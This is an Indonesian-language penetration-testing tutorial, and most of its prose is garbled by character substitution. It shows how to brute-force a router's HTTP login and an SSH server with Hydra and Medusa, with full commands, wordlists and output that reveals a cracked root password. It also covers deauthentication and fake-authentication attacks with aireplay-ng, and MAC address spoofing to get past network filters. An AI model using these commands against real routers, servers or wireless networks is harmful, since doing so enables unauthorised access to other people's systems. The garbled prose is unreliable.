default 192.168.1.1 0.0.0.0 UG 0 0
0 wlan0
192.168.1.0 * 255.255.255.0 U 0 0
0 wlan0
Ke-.#$ki#a# -ereka ti&ak &i 2ass<,r& sa#$at /esar > terka&a#$ kita har.s
-e#$etes#"a ter%e/ih &ah.%.. Sa"a aka# -e-/.ka (RL 1:'.169.1.' &ari <e/
/r,<ser %"#1 .#t.k -e-astika# ser!ice a2a "a#$ kirakira &i 2akai &a%a-
-e%ak.ka# -et,&e sera#$a# i#i.
root@bt:~# lynx http://192.168.1.1
H-- &e#$a# %"#1 sa"a -e#&a2atka# ti2e r,.ter IH1!1; <0;;SJ *#+,r-asi &ari
$,,$%e -e#$ha#tarka# sa"a ke2a&a je#is -,&e- IM,&e- GTE .5VAF /3FF* J &a#
i#i -e-.&ahka# sa"a .#t.k -e-/.at .ser %ist.
Sa"a c,/a -e-as.ka# .ser Ia&-i#J 2a&a %"#1 .ser %,$i# ..
Ke-.&ia# 2ass j.$a Ia&-i#J
Ga$a% ter#"ata.. 2ass<,r& s.&ah ti&ak &e+a.%t %a$i > -e#$i#$at 2ass<,r& secara
&e+a.%t a&a%ah a&-i#Qa&-i#.
e5b4at 4ser/ist 4ser dan 6assword
Ke-.&ia# sa"a -e-/.at %ist 2ass<,r& &a# .ser "a#$ sa"a si-2a# &i &ir Ar,,tA/r.te .
(#t.k -e-/.at %ist 2ass a#&a /isa -e#$$.#aka# /er-aca--aca- a.&it,r. Ata.
a#&a /isa -e#$$.#aka# %ist 2ass<,r& &a# .ser @ &icti,#ar" B "a#$ te%ah a&a.
root@eichel:~# mkdir brute
root@eichel:~# cd brute
root@eichel:~/brute# nano user.txt
root@eichel:~/brute# ls
user.list
root@eichel:~/brute# nano pass.txt
root@eichel:~/brute# ls
pass.list user.list
Me%ihat &ari je#is %,$i# 2a$e "a#$ &a2at &i /.ka -e%a%.i /r,<ser @ htt2 B -aka sa"a
-e#$a-/i% kesi-2.%a# /ah<a -et,&e "a#$ /aik saat i#i a&a%ah -et,&e Ihttp6getJ
"r4te3orcin1 in action
(#t.k -e%ak.ka# sera#$a# kita -as.ka# 2eri#tah &i /a<ah i#i
hydra 192.168.1.1 -L /root/brute/user.txt -I
/root/brute/pass.txt -t 1 -e ns - f -V http-get /
ketera#$a# Q
-L Spesifikasi direktori username wordlist
-P Spesifikasi direktori password wordlist
-t Limit koneksi ( timeout )
-f Menghentikan secara otomatis setelah melakukan
test bruteforcing
-v verbos output ( mode text output )
-M Spesifikasi module yang di gunakan
-m Spesifikasi opsi pada module yang di gunakan
)k ta-2ak 2a&a $a-/ar &i atas /ah<a h"&ra te%ah -e#e-.ka# %,$i# &a# 2ass<,r&
"a#$ !a%i&. Yait. .ser Q a&-i# &a# 2ass<,r& ^ 1'0
Ketika sa"a -e#c,/a .#t.k -e-as.ki ha%a-a# r,.ter &e#$a# %"#1 /r,<ser >
ta-2ak#"a /erhasi% &e#$a# /aik.
C,#t,h '
4e#$$.#aa# H"&ra terha&a2 2e#"era#$a# terha&a2 ser!ice ssh
SSH ata. sec4re s2e// -er.2aka# %,$i# "a#$ ter-as.k sec.re > kare#a &e#$a#
a&a#"a &sa &a# rsa ke" > ssh tere#skri2si &e#$a# /aik hi#$$a s.%it .#t.k &isera#$
&e#$a# -e#$$.#aka# M*TM @ -a# ,# the -i&&%e attack B Na-.# -e-a#$ -asih
!.r# .#t.k h"&ra /r.te+,rci#$> jika ti&ak -e-i%iki 2e#$a-a#2e#$a-a# %,$i#
atte-2 /r.te+,rce.
Da%a- c,#t,h ka%i i#i sa"a he#&ak -e%ak.ka# /r.te+,rci#$ terha&a2 ssh ser!ice
&e#$a# -asih -e#$$.#aka# 2,rt sta#&art "ait. 2,rt ''. Mesi# tar$et teri#sta% %i#.1
+e&,ra 15 &e#$a# ser!ice ssh "a#$ akti+.
4erhatika# .. h"&ra -e%ak.ka# atte-2 %,$i# secara sat. &e-i sat. &a# /erhasi%
-e#e-.ka# 2ass<,r& &ari ssh. )h "a 2a&a saat i#i sa"a -e#a-/ahka# ,2si +o
? o4t64t @ .#t.k -e#catat hasi% &ari ,2erasi &i atas.
root@eichel:~# cat hasil.txt
# Hydra v7.1 run at 2012-02-05 11:06:55 on 192.168.1.6 ssh (hydra
-L /root/brute/user.txt -P /root/brute/pass.txt -t 3 -e ns -f -V
-o /root/hasil.txt 192.168.1.6 ssh[22][ssh] host: 192.168.1.6
login: root password: nchan
/a$ai-a#a jika 2,rt terse/.t s.&ah ti&ak sta#&art %a$i K Misa%ka# ssh -e#$$.#aka#
2,rt &.9) &a# /.ka# sta#&art %% %a$i. Kita ti#$$a% -e#a-/ahka# ,2si +s se2erti
c,#t,h &i /a<ah i#i
root@eichel:~# hydra 192.168.1.6 -L /root/brute/user.txt -P
/root/brute/pass.txt -t 3 -e ns -f -V -o /root/hasil1.txt -s
7634 ssh
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for
legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-02-05
11:16:31
[DATA] 3 tasks, 1 server, 27 login tries (l:3/p:9), ~9 tries per
task
[DATA] attacking service ssh on port 7634
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "admin" - 1
of 27 [child 0]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "" - 2 of 27
[child 1]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "123" - 3 of
27 [child 2]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "1234" - 4
of 27 [child 1]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "adm" - 5 of
27 [child 0]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "masuk" - 6
of 27 [child 1]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "letmein" -
7 of 27 [child 2]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "toor" - 8
of 27 [child 0]
[ATTEMPT] target 192.168.1.6 - login "admin" - pass "nchan" - 9
of 27 [child 1]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "root" - 10 of
27 [child 2]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "" - 11 of 27
[child 0]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "123" - 12 of
27 [child 1]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "1234" - 13 of
27 [child 0]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "adm" - 14 of
27 [child 2]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "masuk" - 15
of 27 [child 0]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "letmein" - 16
of 27 [child 1]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "toor" - 17 of
27 [child 2]
[ATTEMPT] target 192.168.1.6 - login "root" - pass "nchan" - 18
of 27 [child 0]
[ATTEMPT] target 192.168.1.6 - login "" - pass "" - 19 of 27
[child 1]
[7634][ssh] host: 192.168.1.6 login: root password: nchan
[STATUS] attack finished for 192.168.1.6 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-02-05
11:16:41
4erhatika# h.r.+ "a#$ sa"a te/a%ka# &a# sa"a /eri <ar#a -erah. H"&ra te%ah
/erhasi% -e%ak.ka# cracki#$ &e#$a# 2,rt "a#$ &ite#t.ka#.
9.%. ed4sa

9.%.$. Pen1ertian ed4sa
Me&.sa a&a%ah sa%ah sat. t,,%s /r.te+,rci#$ @ attack ,#%i#e 2ass<,r& B /ersi+at CL* >
Ya#$ -e-a#$ ha-2ir sa-a 2e#$$.#aa##"a &e#$a# h"&ra. Ti#$$a% kita /isa
-e-i%ih a2a "a#$ kirakira he#&ak kita 2akai.
root@eichel:~# medusa
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
<jmk@foofus.net>
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P
file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more
information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s]
Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod
extension)
-m [TEXT] : Parameter to pass to the module. This can be passed
multiple times with a
different parameter each time and they will all be sent
to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default
3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number
of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The
default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password
found.
-F : Stop audit after first valid username/password found on
any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
9.%.%. Pen114naan ed4sa
4e#$$.#aa# -e&.sa 2a&a /acktrack ti&ak%ah s.%it kare#a -e&.sa &a2at &i 2a#$$i%
&ari ter-i#a% ata. 2a&a -e#. #a$a.
S"#ta1 .-.- Q
Medusa [-h host|-H file] [-u username|-U file] [-p
password|-P file] [-C file] -M module [OPT]
Me#arik .#t.k &isi-ak /ah<a -e&.sa -e-/e&aka# 2e#$$.#aa# I0ordJ &e#$a#
IfileJ &a%a- h.r.+ /esar &a# h.r.+ keci%. C,#t,h 2e#$$.#aa# +4 /isa &iisika#
.ser#a-e secara <,r& ata. single .ser#a-e &a# +U &i isika# 2ath &i-a#a .ser.%ist
kita /era&a.
Kare#a ha-2ir sa-a 2e#$$.#aa##"a &e#$a# h"&ra > -aka sa"a ti&ak aka#
-e-/ahas secara &etai% 2e#$$.#aa# -e&.sa. Ha#"a aka# sa"a /eri c,#t,h. Me&.sa
-e#$$.#aka# -,&e -,&.%e "a#$ -e-a#$$i% 2%.$i# -,&.%e "a#$ /era#eka ra$a-.
(#t.k -e%ihat -,&.%-,&.% "a#$ terse&ia > a#&a &a2at -e%ihat#"a 2a&a &irekt,ri
7!usr!local!lib!medusa!modules H
root@eichel:/usr/local/lib/medusa/modules# ls
cvs.mod mysql.mod postgres.mod smtp.mod
telnet.mod
ftp.mod ncp.mod rexec.mod smtp-vrfy.mod
vmauthd.mod
http.mod nntp.mod rlogin.mod snmp.mod vnc.mod
imap.mod pcanywhere.mod rsh.mod ssh.mod web-
form.mod
mssql.mod pop3.mod smbnt.mod svn.mod
wrapper.mod
C,#t,h 1
ed4sa HTTP br4te3orce
root@bt# medusa -h 192.168.1.1 -u admin -p
/root/brute/pass.txt -M http
ed4sa SSH br4te3orce
# medusa -h 192.168.1.6 -U /root/brute/user.txt -P
/root/brute/pass.txt -M ssh
"A" (II
!IFIFU
Oleh : zee eichel
$. AIRCRACK+NG
$.$. Pen1ertian Aircrack+n1
Aircrack#$ a&a%ah s.at. t,,%s a.&it,r sec.rit"
"a#$ &it.j.ka# .#t.k 2e#etrati,# testi#$
kea-a#a# jari#$a# <ire%ess. Aircrack
-e-i%iki ke-a-2.a# .#t.k -e%ak.ka#
cracki#$ 9;'.11 =E4 &a# =4A4SK &e#$a#
-e#$$.#aka# /er/a$ai -et,&e se2erti 8MS>
4T= ata. /r.te +,rce attacks.
$.%. Air5on+n1
Air-,##$ a&a%ah t,,%s "a#$ /iasa &i$.#aka# .#t.k -e#$akti+ka# -,&e -,#it,r
2a&a i#ter+ace <ir%ess. Air-,##$ j.$a terka&a#$ &i$.#aka# .#t.k -e#$ecek
a2akah &ri!er 2a&a i#ter+ace <ire%ess &ari har&<are <ir%ess te%ah ter/aca &e#$a#
/aik ata. ti&ak.
root@eichel:~# airmon-ng
wlan0 Intel 3945ABG iwl3945 - [phy0]
wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
4erhatika# c,#t,h &i atas... sa"a -e-a#$$i% 2eri#tah air-,##$ &a# ter%ihat '
i#ter+ace "a#$ te%ah ter&etek &e#$a# /aik > &i -a#a <%a#1 -er.2aka# &e!ice "a#$
ter&eteksi -e%a%.i .s/ 2,rt.
$.%.$. Pen114naan air5on+n1
airmon-ng start | stop [ interface] [channel ]
Keterangan :
start = untuk memulai proses mode monitor
stop = untuk menghentikan proses mode monitor
interface = wireless device
channel = channel yang dikehendaki
root@eichel:~# airmon-ng start wlan0 11
(monitor mode enabled on mon0)
4erhatika# /ah<a -,#it,r -,&e e#a/%e& ,# -,#; secara &e+a.%t -,&e -,#it,r 2a&a
i#ter+ace <%a#; &i e#a/%e 2a&a -,#;. (#t.k -e#$ehe#tika# -,&e -,#it,r kita
-as.ka# 2eri#tah se/a%ik#"a
airmon-ng stop mon0
root@eichel:~# airmon-ng stop mon0
mon0 Intel 3945ABG iwl3945 - [phy0] (removed)
$.9 Iwcon3i1 co55and
(#t.k -e%ihat stat.s secara ri#ci 2a&a -asi#$-asi#$ i#ter+ace <ir%ess kita
&a2at -e-as.ka# 2eri#tah Iiwcon3i1J
root@eichel:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11abg ESSID:"ibteam-3g"
Mode:Managed Frequency:2.462 GHz Access Point:
00:1E:C1:4C:BF:F8
Bit Rate=54 Mb/s Tx-Power=14 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=70/70 Signal level=-35 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid
frag:0
Tx excessive retries:0 Invalid misc:11 Missed
beacon:0
wlan1 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-
Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Ata. .#t.k -e%ak.ka# sca##i#$ terha&a2 jari#$a# h,ts2,t "a#$ terse&ia kita /isa
$.#aka# 2eri#tah Ii0list scann 0lanFJ 4eri#tah i<%ist sca# -er.2aka# a%ter#ati+
ter/aik .#t.k -e#$.-2.%ka# &ata&ata @ i#+,r-ati,# $atheri#$ B "a#$ #a#ti#"a
/er$.#a 2a&a 2r,ses2r,ses se%a#j.t#"a
%. AIRODUP+NG
Air,&.-2#$ kita $.#aka# .#t.k -e%ak.ka# -e#a#$ka2 @ ca2.t.re B +ra-e ra<
9;'.11 &a# -e#$.-2.%ka# =E4 *Vs @*#itia%iHati,# Vect,rsB "a#$ #a#ti#"a aka#
&ita#$a#i ,%eh aircrack#$ 2a&a akhir#"a.
4e#$$.#aa# Q
airodump-ng <options> <interface>[,<interface>,...]
S2esi+ikasi 2eri#tah
root@eichel:~# airodump-ng
Airodump-ng 1.1 r2029 - (C) 2006-2010 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: airodump-ng <options> <interface>[,<interface>,...]
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for
--showack
-f <msecs> : Time in ms between hopping
channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more
packets
are received (Default: 120
seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet,
netxml
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
-a : Filter unassociated clients
By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should
hop
-C <frequencies> : Uses these frequencies in MHz to
hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch
--help : Displays this usage screen
Se/a$ai c,#t,h 2e#$$.#aa# air,&.-2 &e#$a# -e-akai i#ter+ace terte#t. a&a%ah
"ARIS KETERANGAN
"SSID Informasi mac address accespoint ( AP )
P!R Informasi signal dari interface. Jika signal
tersebut besar berarti kita dekat dengan
AP dan begitu juga dengan client-client
yang lainnya.
R-V Ukuran kemampuan atau kualitas dalam
penerimaan paket ( manajemen dan data
frame )
"eacons Jumlah announce ment paket yang
dikirim oleh AP
Mdata Jumlah paket data yang berhasil
ditangkap
Ms Jumlah paket data per detik
CH hannel access point
" !ecepatan maksimum dari access point "
Ingat ketentuan ini
- #$ % && berarti '().&&b
- #$ % )) berarti '().&&b*
ENC +nskripsi algoritma yang di gunakan
( ,ep" ,pa" ,pa) )
CHIPER hiper yang terdeteksi
AUTH Autentifikasi protokol yang digunakan
( -!A" P-! " .P/ )
SSID -sid dari Access point
STATION lient mac address
'OST Paket data yang hilang pada &( detik
terakhir
Packets Jumlah paket yang dikirim oleh client
9. AIREP'A:+NG
Aire2%a"#$ a&a%ah t,,%s "a#$ -a-2. -e%ak.ka# &ea.the#ticati,# "a#$ #a#ti#"a
aka# &i $.#aka# .#t.k -e#a#$ka2 &ata ha#&shake> a.the#ticati,# 2a%s.>
i#teracti!e 2acket re2%" > ha#&cra+te& AR4 reU.est i#jecti,# &a# AR4 reU.est re
i#jecti,# "a#$ #a#ti#"a aka# &i $.#aka# .#t.k -e#a#$ka2 &ata ha#&shake.
Ti2e 2e#"era#$a# aire2%a" &i .r.tka# &e#$a# k,#&isi #.-erik
Attack >Q Dea.the#ticati,#
Attack $Q 8ake a.the#ticati,#
Attack %Q *#teracti!e 2acket re2%a"
Attack 9Q AR4 reU.est re2%a" attack
Attack )Q K,reK ch,2ch,2 attack
Attack *Q 8ra$-e#tati,# attack
Attack BQ *#jecti,# test
9.$. Pen114naan aire6/a7+n1
aire6/a7+n1 Wo6tionsX Wre6/a7 inter3aceX
)2si 2e#$$.#aa#
root@eichel:~# aireplay-ng
Aireplay-ng 1.1 r2029 - (C) 2006-2010 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default:
1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't
be determined,
ignore the mismatch, needed for
unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-
0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
Aire2%a" -e-i%iki &.a s.-/er "a#$ -e#ja&i ac.a##"a "ait. &a%a- -et,&e
-e-/aca secara %a#$s.#$ a%ira# 2aket &ari i#ter+ace &a# -e%a%.i se/.ah +i%e 2re
ca2t.re @ 2ca2 B.
O6si s45ber C
1. +i i3ace ^-e#a#$ka2 2aket %a#$s.#$ &ari i#ter+ace "a#$ &i$.#aka#
'. +r 3i/e ^ e1trak 2aket &ata &ari +i%e 2ca2
(#t.k -e-i%ih sera#$a# 2erhatika# ,2si,2si &i /a<ah i#i
# dea4t2 co4nt Q &ea.the#ticate 1 stati,# ata. se%.r.h @ a%% ^ ; B
++3akea4t2 de/a7 Q a.the#ticati,# 2a%s. &e#$a# A4 @1B
++interacti=e Q i#teracti!e +ra-e se%ecti,# @'B
++ar6re6/a7 Q sta#&ar& AR4reU.est re2%a" @0B
++c2o6c2o2 Q &ecr"2tAch,2ch,2 =E4 2acket @3B
++3ra15ent Q $e#erates !a%i& ke"strea- @5B
++test Q tes i#jeksi @+BB
9.%. In;ection testin1
Me%ak.ka# tes i#jeksi se/e#ar#"a -e-astika# a2akah &e!ice i#ter+ace a#&a -a-2.
-e%ak.ka# i#jeksi &a# -e%ak.ka# 2i#$ terha&a2 A4 "a#$ aka# -e-astika#
/e/era2a s2esi+ik i#jeksi "a#$ -e-i%iki ke-.#$ki#a# s.kses.
C,#t,h 2e#$$.#aa#
aireplay-ng -9 wlan0
9.9. Dea4t2entication

aireplay-ng -0 1 -a [ AP bssid ] -c [ client -bssid ]
[ interface ]
9.9.$. 3akea4t2 de/a7
aireplay-ng -1 0 -e [ssid-ap] -y [ sharedkeyxorfile ] -a
[ap-bssid ] -h [host-bssid] [interface]
C,#t,h kas.s Q
aireplay-ng -1 0 -e blaspemy -y sharedkey-
C8:64:C7:4B:B8:D0.xor -a C8:64:C7:4B:B8:D0 -h
00:09:5B:EC:EE:F2 -w sharedkey mon0
De#$a# s2esi+ikasi
1 -,&e 2e#"era#$a# +ake a.the#ticati,#
; 2e#"era#$a# IathenticateJ ha#"a seka%i &i %ak.ka#
e I/%as2e-"J a&a%ah SS*D &ari A4
" share&ke"C8:64:C7:4B:B8:D0.1,r a&a%ah +i%e 4RGA 1,r
a C8:64:C7:4B:B8:D0 access 2,i#t MAC a&&ress
h ;;Q;:Q5BQECQEEQ8' i#ter+ace -ac a&&ress
-,#; a&a%ah #a-a &ari i#ter+ace
4a&a kas.s A4 terte#t. -aka kita /isa $.#aka# ,2si &i /a<ah i#i
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a
C8:64:C7:4B:B8:D0 -h 00:09:5B:EC:EE:F2 mon0
Di-a#a Q
6;;; IRea.the#ticateJ setia2 6;;; sec,#&s.
, 1 Me#$iri- ha#"a sat. set 2aket 2a&a s.at. <akt.. Secara &e+a.%t 2aket aka#
&ikiri- secara -.%ti2%e> kea&aa# i#i ka&a#$ -e-/i#$.#$ka# /e/era2a A4
U 1; Me#$iri-ka# Ikee2 a%i!e 2acketsJ setia2 1; &etik
C,#t,h ke/erhasi%a#
11:44:55 Sending Authentication Request
11:44:55 AP rejects open-system authentication
Part1: Authentication
Code 0 - Authentication SUCCESSFUL :)
Part2: Association
Code 0 - Association SUCCESSFUL :)
). acc2an11er
).$ Pen1ertian acc2an11er
&A+ Address 2&edia Access +ontrol Address3
adalah sebuah alamat 8aringan yang
diimplementasikan pada lapisan data6link
dalam tu8uh lapisan model @*I, yang
merepresentasikan sebuah node tertentu dalam
8aringan. MAC A&&ress j.$a seri#$ &ise/.t
se/a$ai Ether#et a&&ress> 2h"sica% a&&ress>
ata. har&<are a&&ress. Da%a- se/.ah jari#$a#
/er/asis Ether#et> MAC a&&ress -er.2aka#
a%a-at "a#$ .#ik "a#$ -e-i%iki 2a#ja#$ #C6
bit @6 /"teB "a#$ -e#$i&e#ti+ikasika# se/.ah
k,-2.ter> i#ter+ace &a%a- se/.ah r,.ter> ata. #,&e %ai##"a &a%a- jari#$a#. De#$a#
kata %ai# -ac a&&ress &i $.#aka# .#t.k -e-/e&aka# &a# -e#$e#a% -asi#$'
ke.#ika# h,st.
Ba#"ak -aks.& &a# t.j.a# sese,ra#$ .#t.k -e#$$a#ti Mac A&&ress> a&a "a#$
-e#$$a#ti Mac A&&ress kare#a akses i#ter#et 2a&a se/.ah jari#$a# s.&ah ter/%,ck>
a&a j.$a &e#$a# t.j.a# .#t.k hacki#$ <ire%ess h,ts2,t "a#$ &i2r,tect -e#$$.#aka#
Mac A&&ress 8i%ter &a# ti&ak -e#.t.2 ke-.#$ki#a# j.$a kare#a rasa 2e#asara#
i#$i# tah. /ahka# &e#$a# a%asa# /e%ajar.
).% Penera6an ac Address Pada "acktrack
Biasa#"a .#t.k -e%ak.ka# s.at. aksi hacki#$ terte#t. attacker aka# -e#$./ah -ac
a&&ress as%i#"a &a# -e%ak.ka# 2e#"a-ara#2e#"a-ara# %ai##"a.
).9. Perinta2 # 6erinta2 dasar 6ada conso/e
Be/era2a 2eri#tah2eri#tah &asar "a#$ /erh./.#$a# &e#$a# MAC a&&ress a&a%ah
se/a$ai /erik.t Q
Me%ihat MAC a&&ress 2a&a %,ca%h,st kita
i2 a&&r sh,< &e! Xi#ter+aceY
root@bt:~/program/evil# ip addr show dev eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc
pfifo_fast state UP qlen 1000
link/ether 44:87:fc:56:86:85 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.3/24 brd 192.168.1.255 scope global eth0
inet6 fe80::4687:fcff:fe56:8685/64 scope link
valid_lft forever preferred_lft forever
ata. &a2at kita $.#aka# cara
ifconfig [interface] |grep Hwaddr
root@bt:~/program/evil# ifconfig eth0 |grep HWaddr
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
).). en14ba2 ac Address
(#t.k -e#$$a#ti se/.ah -ac a&&ress &e#$a# si-2%e se/e#ar#"a kita /isa
-e#$$.#aka# 2eri#tah Q
ifconfig [interface] down hw ether[mac:yang:di:ingin:kan]
).*. ac Address C2an11er Too/s
Se/e#ar#"a 2a&a &istr, kesa"a#$a# kita s.&ah terse&ia t,,%s .#t.k i#i . T,,%s
terse/.t &i/eri #a-a macchanger1 T,,%s i#i &i /.at ,%eh sese,ra#$ "a#$ /er#a-a
Alvaro ,opeE @rtega . (#t.k -e#$akses t,,%s i#i a#&a &a2at secara %a#$s.#$
-e%ihat ,2si Ehe%2 2a&a -e#. naga.
Misce%%a#e,.s Misce%%a#e,.s Net<,rk -accha#$er
Ata. &a2at %a#$s.#$ -e#$akses#"a 2a&a c,#s,%e
root@bt:~# macchanger
GNU MAC Changer
Usage: macchanger [options] device
Try `macchanger --help' for more options.
8,r-at 2e#$$.#aa# Q
macchanger [options] device
-ari kita 2erhatika# ,2si,2si &ari t,,%s i#i
root@bt:~# macchanger --help
GNU MAC Changer
Usage: macchanger [options] device
-h, --help Print this help
-V, --version Print version and exit
-s, --show Print the MAC address and exit
-e, --endding Don't change the vendor bytes
-a, --another Set random vendor MAC of the
same kind
-A Set random vendor MAC of any
kind
-r, --random Set fully random MAC
-l, --list[=keyword] Print known vendors
-m, --mac=XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX
Report bugs to alvaro@gnu.org
$. +2 ata. ++2e/6 a&a%ah ,2si "a#$ &i$.#aka# .#t.k -e%ihat se-.a ,2si
/a#t.a# 2a&a t,,%s i#i
%. +( ata. ++=ersion a&a%ah ,2si .#t.k -e%ihat !ersi &ari t,,%s terse/.t
root@bt:~# macchanger -V
GNU MAC changer 1.5.0
Written by Alvaro Lopez Ortega <alvaro@gnu.org>
Copyright (C) 2003 Free Software Foundation, Inc.
This is free software; see the source for copying
conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
se2erti "a#$ a#&a %ihat 2a&a saat artike% i#i &it.%is ter#"ata t,,%s i#i te%ah -e#ca2ai
!ersi $.*.>
9. +s ata. ++s2ow a&a%ah ,2si .#t.k -e%ihat -ac a&&ress 2a&a i#ter+ace
terte#t.
+,r-at 2e-akaia# Q
5acc2an1er +s Ginter3aceH
zee@eichel:~# macchanger -s eth0
Current MAC: 44:87:fc:56:86:85 (unknown)
zee@eichel:~#
). +e ata. ++endin1 a&a%ah ,2si a$ar -accha#$er -er./ah -ac a&&ress ta#2a
-e#$./ah #i%ai !e#&,r
root@bt:~# macchanger -e eth0
Current MAC: 44:87:fc:56:86:85 (unknown)
Faked MAC: 44:87:fc:af:81:4c (unknown)
root@bt:~# macchanger -e eth0
Current MAC: 44:87:fc:af:81:4c (unknown)
Faked MAC: 44:87:fc:1d:11:cf (unknown)
(#t.k %e/ih -e#$erti +.#$si ti&ak -er./ah #i%ai !e#&,r > 4erhatika# 2a&a ske-a
2e-/a$ia# +,r-at MAC &i /a<ah i#i
Na5a =endor A/a5at AC
A/a5at AC
Cisc, S"ste-s
Ca/%etr,# S"ste-s
*#ter#ati,#a% B.si#ess Machi#e C,r2,rati,#
0C,- C,r2,rati,#
GVC C,r2,rati,#
A22%e C,-2.ter
He<%ett4ackar& C,-2a#"
;; ;; ;C
;; ;; 1D
;; ;3 AC
;; '; A8
;; C; A9
;9 ;; ;7
;9 ;; ;:
(#t.k -e%ihat +,r-at =endor database a#&a &a2at -e#$.#j.#$i ta.ta# &i /a<ah i#i
htt2QAA<<<.-ac!e#&,r%,,k.2.c,-A
*. a ata. Ea#,ther a&a%ah ,2si "a#$ &i $.#aka# .#t.k -e#$./ah #i%ai -ac
a&&ress &e#$a# !e#&,r "a#$ seje#is secara acak @ ra#&,- B
root@bt:~# macchanger -a eth0
Current MAC: 44:87:fc:1d:11:cf (unknown)
Faked MAC: 00:30:a6:62:ea:27 (Vianet Technologies, Ltd.)
